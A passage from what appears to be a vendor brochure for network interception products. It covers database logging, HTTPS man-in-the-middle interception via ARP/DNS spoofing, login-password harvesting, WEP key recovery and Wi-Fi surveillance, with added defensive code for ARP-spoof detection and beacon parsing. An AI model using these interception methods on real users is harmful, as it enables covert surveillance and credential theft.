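                self.current_db[key] = db
                out.append(SqlRecord(ts, client_ip, server_ip, db, "COM_INIT_DB", db))
            elif cmd == COM_QUERY:
                sql = body.decode("utf-8", "replace")
                m = ACTION_RE.match(sql)
                action = m.group(1).upper() if m else "OTHER"
                out.append(SqlRecord(ts, client_ip, server_ip,
                                     self.current_db.get(key, "<unknown>"), action, sql))
            # other commands (ping, prepared statements, ...) are not recorded here
        return out


def mysql_packet(seq: int, payload: bytes) -> bytes:
    """Encode one packet; used only to build the constructed sample stream below."""
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


# Constructed sample: statements from the SQL log screenshot, as a client would
# send them after selecting the ED schema, plus one destructive statement.
SAMPLE_STREAM = (
    mysql_packet(0, bytes([COM_INIT_DB]) + b"ED")
    + mysql_packet(0, bytes([COM_QUERY]) + b"SELECT count(*) FROM HTTPLOG")
    + mysql_packet(0, bytes([COM_QUERY]) + b"SELECT AUTO, DATETIME, ACCOUNT FROM WEBMAIL")
    + mysql_packet(0, bytes([COM_QUERY]) + b"DELETE FROM HTTPLOG WHERE ACCOUNT='report'")
)


def demo() -> List[SqlRecord]:
    logger = MySqlSessionLogger()
    return logger.process("2012-01-01 03:32:53", "192.168.1.199", "192.168.1.85", SAMPLE_STREAM)


if __name__ == "__main__":
    for r in demo():
        print(f"{r.timestamp} {r.client_ip}->{r.server_ip} db={r.db_name} {r.action}: {r.statement}")
```

Statements executed through server-side prepared statements (COM_STMT_PREPARE / COM_STMT_EXECUTE) carry their parameters in binary form and would need separate handling; and once a session is negotiated over TLS, nothing after the handshake is readable from a mirror port, which is the limit of any passive DB monitor.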


ED-GS Implementation 


Diagram: ED-GS deployment on the intranet. Client PCs reach, through a switch/router, a server farm holding the database servers, the email server, an ERP server and the file servers. All inbound and outbound data at the gateway of the server farm is mirrored to ED-GS, which keeps all activity records of transactions, emails and file access for audit and monitoring.

Enterprise Data Guard System on Intranet

> Passive operation: no impact on network performance and no effect on the databases
> Integrates with SIEM
> 1 or 2 tiers of infrastructure for optimization
> ED-GS must be deployed between the servers and the user clients, at the gateway of the server farm
> Data is acquired through the mirror (SPAN) port or forensic port of the switch/router

Because the capture is passive, ED-GS can reconstruct only what is readable on the wire: database sessions negotiated over TLS, and SMB 3 shares with encryption enabled, cannot be decoded from a mirror port, and traffic that does not cross the mirrored switch is not seen at all.


Sample — Database Commands Logging 


Screenshot: SQL log list, one row per captured statement with date-time, account (the DB login used, "report" in the example), password (masked; revealed with "Pass Show"), client IP (192.168.1.199), server IP (192.168.1.85), DB name (ED), the SQL command (for example SELECT count(*) FROM WEBMAIL; SELECT COUNT(AUTO) FROM HTTPLOG; SELECT AUTO, DATETIME, ACCOUNT, …), DB type (MySQL), a similar-search link and a WhoIs link; 927 records over 186 pages in the example. The SQL log search form takes a date/time range, client IP (with "More IP…"), user and DB name, each with exact or similar matching.

Since captured DB passwords are stored and can be revealed with "Pass Show", the ED-GS console itself holds production credentials; access to it should be limited to the authority groups defined in the system.

> List of all DB transactions
> Conditional search on all DB transaction records
> Works on MySQL, MS SQL Server and Oracle DB

Sample — MS CIFS Reconstruction 


Screenshot: CIFS reconstruction list with date-time, account (domain\user where present), username, action (Download in all four rows), server (192.168.1.111), share path (SHARE\… and PUB\client\decisi…), file name, size and WhoIs: an ED manual .doc (19.50M), a .jpg (26.96K) and two ED update .tgz packages (187.60M and 177M), 4 records on 2012-01-01. The CIFS search form takes a date/time range, action, server, path, file name and account, each with exact or similar matching.

> List of all MS file server transactions
> Conditional search on all MS file server transaction records
> Works on MS Windows file servers and clients
Wireline Ethernet Interception & Real-Time Reconstruction Series
HTTPS/SSL MITM Interception System


Introduction to HTTPS/SSL MITM Interception 


HTTPS/SSL Interception Appliance (software + hardware). Customers can also purchase only the software and run it on their own hardware/server.

* HTTPS/SSL traffic (connection sessions) is intercepted either by a MITM attack or by a proxy setup. The HTTPS/SSL MITM Interception system and the HTTPS/SSL Proxy are two separate standalone systems.
* In MITM mode, interception is carried out using DNS and ARP spoofing attacks, or using policy-based routing (PBR) on the L3/4 switch/router.
* HTTPS web pages of the targeted user can be decrypted, decoded and reconstructed; the username and password of web logins can also be obtained.
* Only standard HTTPS/SSL traffic without additional security is intercepted. In practice the target's browser must accept the certificate presented by the interception system (either because the user overrides the certificate warning or because the system's CA certificate has been installed on the target), so sites that pin their certificates, or for which the browser refuses to override a certificate error, are not decrypted.
* In proxy mode, the target users' web browsers must be pre-configured to use the proxy service.

Solution for law enforcement agencies (police intelligence, military intelligence, national security, counter terrorism, etc.) and corporate organizations.


HTTPS/SSL MITM Interception System (Method 1) 


Diagram: HTTPS/SSL interception by MITM attack methodology. Users on a switch/hub segment reach web-based SSL servers (for example Google and Yahoo accounts) through a router/firewall. The HTTPS/SSL MITM system sits on the same segment as the targeted user and the server farm, runs the man-in-the-middle attack against that user, and is managed by an administrator. It intercepts and reconstructs the HTTPS/SSL traffic, obtains the HTTPS page login username and password, and intercepts only specific targets (suspects).


HTTPS/SSL MITM Interception System (Method 1) 


* HTTPS/SSL interception in MITM mode is carried out using DNS and ARP spoofing attacks (Methodology 1).
* HTTPS web pages of the targeted user can be decrypted, decoded and reconstructed; the username and password of web logins can also be obtained.
* The target user's (suspect's) IP address must be known and pre-configured in the setup of the HTTPS/SSL Interception system.
* The target website links (URLs) must also be pre-configured.
* Up to 5 users can be attacked concurrently (more users optional).
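The ARP spoofing that Methodology 1 relies on is also its most visible trace on the network: to sit between the target and the gateway, the interceptor has to answer ARP for an IP that another host already owns. The block below is an added example, written from the defender's side and not part of the vendor's product, of the check a network sensor makes against that: it decodes Ethernet/ARP frames (IPv4 over Ethernet only), learns IP-to-MAC bindings from replies, and reports any IP later claimed by a different MAC. Frames, MAC and IP addresses are constructed for the demo; feeding it live traffic from a raw socket or pcap is not shown, and DNS spoofing is not covered.

```python
import struct
from typing import Dict, List, Optional

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
ETH_HDR = struct.Struct("!6s6sH")             # dst MAC, src MAC, EtherType
ARP_HDR = struct.Struct("!HHBBH6s4s6s4s")     # htype, ptype, hlen, plen, oper, sha, spa, tha, tpa


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def parse_arp(frame: bytes) -> Optional[dict]:
    """Decode an Ethernet/ARP frame for IPv4 over Ethernet; None for anything else."""
    if len(frame) < ETH_HDR.size + ARP_HDR.size:
        return None
    _dst, _src, ethertype = ETH_HDR.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = ARP_HDR.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"oper": oper, "sha": mac_str(sha), "spa": ip_str(spa),
            "tha": mac_str(tha), "tpa": ip_str(tpa)}


class ArpWatch:
    """Learns IP->MAC bindings from ARP replies and flags any IP that is later
    claimed by a different MAC, which is what an ARP-spoofing MITM must do."""

    def __init__(self, static: Optional[Dict[str, str]] = None) -> None:
        self.table: Dict[str, str] = dict(static or {})   # pre-seeded bindings (e.g. the gateway) win

    def observe(self, frame: bytes) -> Optional[str]:
        arp = parse_arp(frame)
        if arp is None or arp["oper"] != ARP_REPLY:
            return None                      # only replies are treated as binding claims here
        ip, mac = arp["spa"], arp["sha"]
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac
            return None
        if known != mac:
            return f"ARP conflict for {ip}: known {known}, now claimed by {mac} (sent to {arp['tpa']})"
        return None


def build_arp_reply(sha: bytes, spa: bytes, tha: bytes, tpa: bytes) -> bytes:
    """Assemble an ARP reply frame; used to build the constructed sample traffic below."""
    return ETH_HDR.pack(tha, sha, ETHERTYPE_ARP) + ARP_HDR.pack(1, 0x0800, 6, 4, ARP_REPLY, sha, spa, tha, tpa)


# Constructed sample (all MAC and IP values made up for the demo).
GATEWAY_MAC = bytes.fromhex("000a120306b7")
VICTIM_MAC = bytes.fromhex("001a805c5bde")
ATTACKER_MAC = bytes.fromhex("001122334455")
GATEWAY_IP, VICTIM_IP = bytes([192, 168, 1, 1]), bytes([192, 168, 1, 12])

SAMPLE_FRAMES = [
    build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),    # genuine gateway reply
    build_arp_reply(VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),    # victim answering the gateway
    build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),   # spoofed: attacker claims gateway IP
    build_arp_reply(ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),  # spoofed: attacker claims victim IP
]


def run_demo() -> List[str]:
    watch = ArpWatch()
    return [msg for msg in (watch.observe(f) for f in SAMPLE_FRAMES) if msg]


if __name__ == "__main__":
    for line in run_demo():
        print(line)
```

The two spoofed replies (one towards the victim, one towards the gateway) are exactly the pair an interceptor sends to relay both directions, and both are reported. Seeding the watcher with the gateway's real MAC, as the `static` argument allows, removes the window in which the first reply seen is trusted blindly; the same idea, applied at the switch, is dynamic ARP inspection.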


To view encrypted content, a key is needed.


HTTPS/SSL MITM Interception System (Method 2) 
Diagram: ISP-scale deployment. Subscriber networks connect through an L3/4 core switch (with policy routing function) to the gateway routers and the Internet. Targeted HTTPS traffic to a given web server is policy-routed to the HTTPS MITM system instead of going directly to the server's SSL gateway. (The diagram is a scaled-down sample for illustration only.)


HTTPS/SSL MITM Interception System (Method 2) 


* The HTTPS MITM Interception system is implemented to decrypt HTTPS traffic (for example Gmail as the target). HTTPS traffic from the subscriber side to the target (for example Gmail) must be rerouted to the HTTPS MITM Interception system; the system has NAT built in and forwards the traffic on to the web servers (for example Gmail).
* For example, traffic to web server IP X.X.X.X (for example Gmail) is redirected, using PBR, from the core switch (L3/4) or core router on the subscriber side to the HTTPS MITM Interception system.
* The HTTPS web content (for example Gmail read and sent) of the targeted user can then be reconstructed in real time by the HTTPS/SSL MITM Interception system.
* Username and password can also be obtained.
* This is usually for large-scale implementations such as enterprise networks, government organization networks or lawful interception at an ISP.


HTTPS/SSL Proxy Interception System 


Diagram: HTTPS/SSL interception by proxy methodology. The HTTPS/SSL Proxy system (sniffer mode + proxy mode) sits between the targeted user group and the router/firewall that leads to the web-based SSL servers (for example Google and Yahoo accounts); it is managed by an administrator. With the proxy pre-configured in the target users' web browsers, it intercepts and reconstructs HTTPS/SSL traffic and the other protocols/services carried through the proxy for the whole group.


HTTPS/SSL Proxy Interception System 


* HTTPS/SSL interception by proxy implementation.
* The proxy must be pre-configured in the targeted users' web browsers.
* The proxy implementation can also capture and reconstruct protocols other than HTTPS/SSL. Some supported protocols are webmail (Yahoo Mail, Gmail, Hotmail, etc.), IM (Yahoo, MSN, ICQ, IRC, QQ, Web MSN, Web Yahoo, etc.), HTTP web browsing, P2P and online games.
* It can be applied to a group of users (more than 100 concurrent interceptions).
* HTTPS/SSL decryption applies only to standard HTTPS/SSL traffic without additional security.

To view encrypted content, a key is needed.


ED2S - Interception of Username & Password 


Screenshot: Account/Password list for the targeted IPs, one row per captured web login with date-time, user IP, user name, password (blurred in the screenshot) and the login URL: 11 records from 2010-08-04 and 2010-08-05 for 192.168.2.101 and 192.168.2.136, with URLs such as https://www.google.com/accounts/ServiceLoginAuth, https://login.yahoo.com/config/login?, https://www.amazon.com/gp/flex/sign-in/select.html, https://www.citibank.com.tw/TWGCB/JSO/signon/… and https://www.global-ebanking.com/…. Callouts mark the targeted IP, the URLs browsed by the target IP, and the login user name and password for each URL.

Sample Gmail Read Reconstruction 

Screenshot: Webmail (Read) list (toolbar: Webmail(Read) | Delete | Search | Account List | Every Page: 10; columns No., Date-Time, Account, Sender, Subject, Webmail Type, Similar). All records are Gmail sessions from 192.168.1.12 on 2011-10-28 between 20:36:36 and 20:36:48; the subjects are mostly forwarded "Bandwidth Monitor Alert" messages, a test message ("testtttt") and a delivery-failure notification. Total 13, Total Page 2, Current Page 1. The detail pane shows one reconstructed message, dated Jun 27 10:39 AM, from Decision Group <decisiongroup2010@gmail.com> to Decision Group <decisiongroup2010@gmail.com> with the body "3453434534534534", rendered with the Gmail page chrome. 


Sample Gmail Sent Reconstruction 

Screenshot: Webmail (Sent) list (toolbar: Webmail (Sent) | Delete | Pass Show | Search | Account List | Every Page: 10; columns No., Date-Time, Account, Sender, Password, Receiver, CC, BCC, Subject, Webmail Type, Similar Search). One record: 2011-10-28 20:37:24, account 192.168.1.12, sender decisiongroup20..., receiver frankie@deci..., type GMail; Total 1, Total Page 1, Current Page 1. The reconstructed message is opened in Internet Explorer from the system's own HTTPS GUI (https://192....) and reads: 

FROM: decisiongroup2010@gmail.com 
DATE / TIME: 2011-10-28 20:37:24 
TO: frankie@decision-groups.com 
SUBJECT: Email from ... 

This is a message for the XXX> 
Thanks. 

Regards, 
FC 


Wireline Ethernet Interception & 
Real-Time Reconstruction Series 
E-Detective Backup Server System 
(Data Retention) 

Introduction to E-Detective Backup Server 

• E-Detective Backup Server (BS) is designed for viewing backup ISO data (reconstructed data backed up by the E-Detective system). 

• Provides a user-friendly GUI. Easy to import (mount an ISO) and view the backup content, especially when there is a large number of backup ISO files. 

• Capable of mounting and viewing multiple backup ISO files at the same time. 

• Works with the E-Detective system's Auto FTP Backup function, so that backup ISO files generated automatically by E-Detective are stored on the Backup Server. 

• Search and Advance Search functions are provided to search across all mounted backup ISO content or within one specific backup ISO. 

• Easy management of backup ISO files. 


Sample Screenshots of ED Backup Server (1) 

Home Page - ISO File List (Mounted Backup ISO) 

Toolbar: ISO File List | Mount ISO File | Delete ISO File | uMount ISO File | Record/Page 

No.  Status   ISO File Name                   Create Time          Backup Mode  File Size 
1    (icon)   DC100315NQ8V_M_20100627220342   2010-06-27 22:03:42  Manual       237MB 
2    (icon)   DC100315NQ8V_M_20100614135017   2010-06-14 13:50:17  Manual       78MB 
Total 2, Total Page 1, Current Page 1 

Home Page - ISO File Content - Service Categories Statistics 

Screenshot: per-ISO record counts by service category (Record/Page: 100). The column headers are protocol icons and are not legible in the capture. Readable totals: 71,897 records in the Summary row, 57,801 in DC100315NQ8V_M_20100627220342 and 14,096 in DC100315NQ8V_M_20100614135017; the two largest categories hold 1,538 and 1,387 records across both ISOs. Total 2, Total Page 1, Current Page 1. 


Sample Screenshots of ED Backup Server (2) 

Top menu: HOMEPAGE | SETUP | STORAGE INFORMATION | SYSTEM | MODIFY PASSWORD | UPDATE | REGISTER 

Screenshot: the ISO File Content statistics page (Record/Page: 100, Summary 71,897 / 57,801 / 14,096 as above) with the HTTP Content category of DC100315NQ8V_M_20100627220342 (1,148 records) opened. The HTTP Content list (columns No., Date-Time, Account, Content; Total 1,148, Total Page 58, Current Page 6) shows records 101 onward for account "frankie" on 2010-06-23 between 16:59:48 and 17:00:47: Bet-at-Home, World Cup 2010 soccer live scores, Facebook, and advertising beacons (googleads.g.doubleclick.net, btag.admeld.com, ad.yieldmanager.com, www4.smartadserver.com, AOL Advertising). One record, "Juventus Sign Custodian Marco Storari - The Offside - Juventus Football Blog", is opened in Internet Explorer and renders the reconstructed article text. The browser's notification bar reads "To help protect your security, Internet Explorer has blocked this website from displaying content with security certificate errors", a warning consistent with the Backup Server GUI being served over HTTPS with a certificate the browser does not trust. 


Sample Screenshots of ED Backup Server (3) 

Top menu: HOMEPAGE | SETUP | STORAGE INFORMATION | SYSTEM | MODIFY PASSWORD | UPDATE | REGISTER 

Free Text Search Function 

Screenshot: ISO File Content page (Record/Page: 100) with Advance Search expanded. After a free-text search the per-category counts drop to 10, 8 and 1 in three categories for DC100315NQ8V_M_20100627220342 and 1 for DC100315NQ8V_M_20100614135017 (Total 2, Total Page 1, Current Page 1). Opening the HTTP Link category lists the matching records: 

HTTP Link (columns No., Date-Time, Account, HOST) 
1.   2010-06-23 12:33:06  frankie     Decision Group - E-Detective 
2.   2010-06-23 11:23:32  frankie     Decision Group - E-Detective 
3.   2010-06-23 09:14:08  defenceorg  Decision Group - E-Detective 
4.   2010-06-23 09:14:05  defenceorg  Decision Group - E-Detective 
5.   2010-06-23 09:14:05  defenceorg  Decision Group - E-Detective 
6.   2010-06-23 09:14:03  defenceorg  Decision Group - E-Detective 
7.   2010-06-23 09:13:55  defenceorg  Decision Group - E-Detective 
8.   2010-06-23 09:13:51  defenceorg  Decision Group - E-Detective 
9.   2010-06-23 09:13:48  defenceorg  Decision Group - E-Detective 
10.  2010-06-23 09:13:47  defenceorg  Decision Group - E-Detective 
11.  2010-06-23 09:13:41  defenceorg  Decision Group - E-Detective 
12.  2010-06-23 09:13:41  defenceorg  Decision Group - E-Detective 
13.  2010-06-23 09:13:39  defenceorg  Decision Group - E-Detective-Network Forensics | Lawful Interception | Data Retention Solutions 
14.  2010-06-23 09:13:38  defenceorg  Decision Group - E-Detective 
15.  2010-06-23 09:13:35  defenceorg  Decision Group - E-Detective 
16.  2010-06-23 00:59:58  defenceorg  Decision Group - E-Detective 
Total 16, Total Page 1, Current Page 1 


Sample Screenshots of ED Backup Server (4) 

Advance Search Function 

Screenshot: ISO File Content page (Record/Page: 100) with the Advance Search dialog open. Search Parameters: Date, Time, Source IP, Destination IP, Email Address, Subject; a Search Category selector; a search History tab. After the search the per-category counts shrink (Summary row starts 16 / 0 / 11 / 6 / 66 / 5 instead of 30 / 0 / 15 / 6 / 66 / 2), with almost all hits in DC100315NQ8V_M_20100627220342 and practically none in DC100315NQ8V_M_20100614135017. Opening HTTP Content shows the filtered list: 

HTTP Content (columns No., Date-Time, Account, Content; Every Page: 5) 
1.  2010-06-23 17:51:09  frankie  tag.admeld.com 
2.  2010-06-23 17:50:54  frankie  www.google.com.sg 
3.  2010-06-23 17:49:55  frankie  ad.sensismediasmart.com.au 
4.  2010-06-23 17:49:55  frankie  medrx.sensis.com.au 
5.  2010-06-23 17:49:43  frankie  Whois record for 117.4.193.88 
Total 1,148, Total Page 230, Current Page 1 


Wireline Ethernet Interception & 
Real-Time Reconstruction Series 
Central Management System (CMS) 

Coming Soon! 

Introduction to CMS 

> Global view (through a centralized web GUI portal) of the very large volume of Internet traffic captured by distributed or multiple E-Detective systems (at the same or different locations). 

> Status information for all ED, ED2S and ED Backup Server systems. 

> Easily aggregate, manage and configure multiple E-Detective systems, ED2S systems (HTTPS/SSL MITM Interception System) and ED Backup Server systems. 

> Centralized reporting. 
> Centralized full-text search and query function. 

CMS Implementation Architecture 

Diagram: E-Detective systems feed the Central Management System, and the Auditor/User works through the CMS UI; the arrows are labelled Management/Query, Data Retention and CMS UI. 

> There are 3 segments/tiers in the entire architecture: 

> 1st - Front-end capture/probes: E-Detective, ED2S (HTTPS/SSL) 
> 2nd - Data retention management system: ED Backup Server system, storage 
> 3rd - Centralized Management System (CMS) 


CMS - Sample GUI (1): Homepage 

Screenshot (Internet Explorer): CMS home page with the menu Home | Data Management | Data Management | System Management | Log Out and a per-probe summary table (Show entries / Search): 

HOST           TYPE    Status  Mail  CHAT  FILE TRANSFER  HTTP  OTHER 
192.168.1.122  ED-DEC  (icon)  300   0     0              0     0 
Showing 1 to 1 of 1 entries. Footer: Copyright Decision Group Inc. All Rights Reserved. 

CMS - Sample GUI (2) 

Screenshot: drilling into host 192.168.1.122 (breadcrumb Home > 192.168.1.122 > HTTP) with protocol tabs POP3 | IMAP | SMTP | WEBMAILR | WEBMAILS | HTTP and a mail list (columns DateTime, Account, From, To, CC, BCC, Subject, Size; 10 entries per page). The visible rows are dated 2012-01-01 01:15:31 to 01:15:55 for account MING302071-PC, with senders including decision@decision.com.tw, seminar@sinter.com.tw, returnedm@return.pec.pcstore.com.tw and webmail@ecfscop.epaper.com.tw, recipients including vic@decision.com.tw, ming@decision.com.tw and ming302071@pchome.co..., and sizes from 4,642 to 280,834 bytes. 


CMS Specifications 

Product: Central Management System (CMS) 

Features and Specifications 

> Server hardware: Asus RS300 or HP ProLiant DL380/385; quad-core CPU (Core i3/i5/i7 class), 8-16 GB RAM, 2-4 HDDs (2 TB in total), 2 Gigabit NICs (Intel chipset recommended). 

> System software: general implementation. 

> System management through a web GUI (IE browser): aggregate, manage and configure multiple E-Detective systems (20 E-Detective systems in the first stage, expandable later). 

> Centralized total statistical reports from multiple E-Detective systems. 

> Centralized data query (search). 

> Centralized alert and notification rules. 

> Centralized authority (user rights) management functions. 

> Others, optional: topology mapping. 


Wireless LAN (Wi-Fi) Interception & 
Real-Time Reconstruction Series 
Wireless-Detective System 

***** 
Only for Government & LEA users! 

Introduction to Wireless-Detective System 

Wi-Fi / WLAN IEEE 802.11a/b/g/n Interception and Forensics Investigation System 

The smallest, mobile, portable and most complete lawful interception system in the world! All in one system! 

* Scans all WLAN 802.11a/b/g/n 2.4 and 5.0 GHz channels for Access Points and STAs. 
* Captures/sniffs WLAN 802.11a/b/g/n packets. 
* Real-time recovery of the WEP key and decryption of WEP traffic (WPA-PSK: optional module). 
* Real-time decoding and reconstruction of WLAN packets. 
* Stores data both as raw packets and as reconstructed content. 
* Displays reconstructed content in a web GUI. 
* Hashed ... and back... 

Important tool for intelligence agencies such as police, military, forensics, legal and lawful interception agencies. 

Notes: Pictures and logo are property of the designated source or manufacturer. 


Wireless-Detective - Implementation Diagram (1) 

Wireless-Detective Standalone System: captures WLAN packets transmitted over the air at ranges of up to 100 meters or more (with the optional high-gain, high-sensitivity antenna). 

Diagram: a router/firewall with an access point serving several wireless STAs; a single Wireless-Detective unit listens passively within radio range of the AP and the stations. 

Wi-Fi Interception and Investigation - Standalone Architecture 
Wireless-Detective System Deployment (captures a single Wi-Fi channel, a single AP or a single STA/user) 

Wireless-Detective - Implementation Diagram (2) 

Wireless-Detective Distributed - Extreme Implementation 
Utilizes multiple/distributed Wireless-Detective systems (master and slaves) to conduct simultaneous capture, forbidding (blocking) and location-estimation functions. 

Diagram: three Wireless-Detective slaves placed around the target AP and its wireless STAs report to a Wireless-Detective master that provides the central management. 

WLAN Lawful Interception - Distributed Architecture 
Wireless-Detective Deployment (utilizes a minimum of 2 systems, master and slaves, for simultaneous capturing/forbidding functions; captures a single channel, a single AP or a single STA) 

Notes: For capturing multiple channels, each Wireless-Detective (WD) can be reconfigured to act as a standalone system. For example: deploy 4 WD systems, each capturing on one channel. 


Wireless-Detective - AP Info - Capture Mode (1) 

Displaying information on wireless devices (APs) in the surrounding area. 

MODE: (•) AP ( ) STA 
Tabs: Capture | Forbidder | Import | Wepkey | History | Compare | Work Log | IDS | Import & Export Config 
Capture Size: none | Notification | Filter | Save List | Refresh: 7 s | Auto Stop | capture by: By Channel / By Channel + AP / Manual 

AP  BSSID              CH  MB/S  KEY      STR  BEACONS  PACKETS  ESSID      STA 
1   00:23:51:7B:4D:CA  6   54    WEP      8    476      0        2WIRE...   0 
2   00:21:29:99:82:B1  6   54    WPA      9    486      0        Hyper...   0 
3   00:1F:B3:2B:53:26  6   54    WEP      ?    180      0        2WIR...    0 
4   00:1D:7E:26:7B:B1  1   48    WPA      12   2467     15       yeoh...    0 
5   00:1B:5B:AF:14:E1  2   54    WEP      ?    394      0        dun...     0 
6   00:1B:5B:BD:60:89  6   54    WEP      34   928      0        2WIRES...  0 
7   00:1A:C4:EF:43:B8  6   54    WEP      ?    364      0        2WIRES...  1 
8   00:18:39:5A:BC:81  6   48    WEP      4    300      0        Elain...   0 
9   00:16:B6:E1:5B:2D  11  54    WEP      3    3        0        LIM...     0 
10  00:13:46:D1:9D:F9  6   ?     Unknown  0    0        21       ?          1 
11  00:11:09:F7:A1:6F  6   48    WPA      27   1282     294      linksys    1 
Count: 11, Total: 1, In page 1, Rows per page: 20 (each row also carries SCAN/MANUAL controls and a Blocking button; cells that are not legible in the capture are shown as ?) 

Obtainable information: MAC address of the wireless AP/router, channel, Mbps, key type, signal strength, beacons, packets, SSID, number of stations connected. 
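
The AP columns above are read straight out of 802.11 beacon frames, and the following block shows how a passive scanner fills them. It is an added example, not code from this page or from Wireless-Detective: it parses the management header, the Privacy bit of the capability field and the tagged parameters (SSID, supported rates, DS channel, RSN and WPA vendor IEs), classifies the KEY column as OPEN, WEP, WPA or WPA2, and counts beacons per BSSID the way the BEACONS column does. All frames, MAC addresses (locally administered 02:... addresses) and ESSIDs (lab-*) are constructed inside the block; a real tool would read frames from a monitor-mode interface or a pcap and strip any radiotap header first.

```python
import struct
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple


@dataclass
class ApInfo:
    bssid: str
    channel: Optional[int]
    max_mbps: float
    key: str          # OPEN, WEP, WPA or WPA2 (the slide's KEY column)
    essid: str


def _mac(raw: bytes) -> str:
    return ":".join(f"{b:02X}" for b in raw)


def parse_beacon(frame: bytes) -> ApInfo:
    """Extract the AP-list columns from one 802.11 beacon (no radiotap header)."""
    fc0 = frame[0]
    if (fc0 & 0x0C) != 0x00 or (fc0 >> 4) != 0x08:      # type 0 (management), subtype 8
        raise ValueError("not a beacon frame")
    bssid = _mac(frame[16:22])                           # addr3 of the management header
    capability = struct.unpack_from("<H", frame, 34)[0]  # after timestamp(8) + interval(2)
    privacy = bool(capability & 0x0010)                  # Privacy bit: some encryption is on
    essid, channel, rsn, wpa = "", None, False, False
    rates: List[float] = []
    pos = 36                                             # first tagged parameter
    while pos + 2 <= len(frame):
        eid, elen = frame[pos], frame[pos + 1]
        data = frame[pos + 2 : pos + 2 + elen]
        if len(data) != elen:
            break                                        # truncated IE: keep what we have
        if eid == 0:
            essid = data.decode("utf-8", "replace")
        elif eid in (1, 50):                             # (extended) supported rates, 500 kb/s units
            rates.extend((r & 0x7F) * 0.5 for r in data)
        elif eid == 3 and elen == 1:                     # DS parameter set = channel
            channel = data[0]
        elif eid == 48:                                  # RSN IE -> WPA2
            rsn = True
        elif eid == 221 and data[:4] == b"\x00\x50\xf2\x01":  # Microsoft OUI, type 1 -> WPA1
            wpa = True
        pos += 2 + elen
    if not privacy:
        key = "OPEN"
    elif rsn:
        key = "WPA2"
    elif wpa:
        key = "WPA"
    else:
        key = "WEP"                                      # Privacy set, no WPA/RSN IE
    return ApInfo(bssid, channel, max(rates, default=0.0), key, essid)


def survey(frames: Iterable[bytes]) -> Dict[str, Tuple[ApInfo, int]]:
    """Aggregate beacons per BSSID, as the capture screen's BEACONS column does."""
    seen: Dict[str, Tuple[ApInfo, int]] = {}
    for frame in frames:
        try:
            info = parse_beacon(frame)
        except (ValueError, struct.error, IndexError):
            continue                                     # data/control/short frames are skipped
        prev = seen.get(info.bssid)
        seen[info.bssid] = (info, prev[1] + 1 if prev else 1)
    return seen


# Constructed sample frames (not captures from the page); locally administered MACs.
def build_beacon(bssid: bytes, essid: str, channel: int, privacy: bool,
                 rsn: bool = False, wpa: bool = False) -> bytes:
    hdr = b"\x80\x00" + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    cap = 0x0001 | (0x0010 if privacy else 0)            # ESS + optional Privacy bit
    fixed = bytes(8) + struct.pack("<H", 100) + struct.pack("<H", cap)
    ies = bytes([0, len(essid)]) + essid.encode()
    ies += b"\x01\x08" + bytes([0x82, 0x84, 0x8B, 0x96, 0x0C, 0x12, 0x18, 0x24])  # 1..18 Mb/s
    ies += b"\x03\x01" + bytes([channel])
    ies += b"\x32\x04" + bytes([0x30, 0x48, 0x60, 0x6C])                          # 24..54 Mb/s
    if rsn:   # RSN IE: version 1, group CCMP, pairwise CCMP, AKM PSK, capabilities 0
        ies += (b"\x30\x14" + b"\x01\x00" + b"\x00\x0f\xac\x04" + b"\x01\x00"
                + b"\x00\x0f\xac\x04" + b"\x01\x00" + b"\x00\x0f\xac\x02" + b"\x00\x00")
    if wpa:   # WPA1 vendor IE: version 1, group TKIP, pairwise TKIP, AKM PSK
        ies += (b"\xdd\x16" + b"\x00\x50\xf2\x01" + b"\x01\x00" + b"\x00\x50\xf2\x02"
                + b"\x01\x00" + b"\x00\x50\xf2\x02" + b"\x01\x00" + b"\x00\x50\xf2\x02")
    return hdr + fixed + ies


SAMPLE_WEP = build_beacon(bytes.fromhex("020000000001"), "lab-wep", 6, privacy=True)
SAMPLE_WPA2 = build_beacon(bytes.fromhex("020000000002"), "lab-wpa2", 1, privacy=True, rsn=True)
SAMPLE_WPA = build_beacon(bytes.fromhex("020000000003"), "lab-wpa", 11, privacy=True, wpa=True)
SAMPLE_OPEN = build_beacon(bytes.fromhex("020000000004"), "lab-open", 6, privacy=False)

if __name__ == "__main__":
    frames = [SAMPLE_WEP, SAMPLE_WEP, SAMPLE_WPA2, SAMPLE_WPA, SAMPLE_OPEN]
    for bssid, (info, n) in survey(frames).items():
        print(f"{bssid}  ch {info.channel}  {info.max_mbps} Mb/s  {info.key:<5} beacons={n}  {info.essid}")
```

The KEY classification mirrors what a scanner can know from beacons alone: the Privacy bit says "encrypted", and only the RSN or WPA vendor IE distinguishes WPA/WPA2 from WEP. Signal strength and packet counts, the other columns on the slide, come from the radiotap header and from data frames respectively, not from the beacon body.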


Wireless-Detective - STA Info - Capture Mode (2) 

Displaying information on wireless devices (STAs) in the surrounding area. 

Hard Disk Information: 146G / Used 3.3G / Available 136G / Available (%) 97% 
Tabs: Capture | Forbidder | Import | Wepkey | History | Compare | Work Log | IDS | Import & Export Config 
MODE: ( ) AP (•) STA 
Capture Size: none | Notification | Filter | Save List | Refresh: 7 s | Auto Stop 

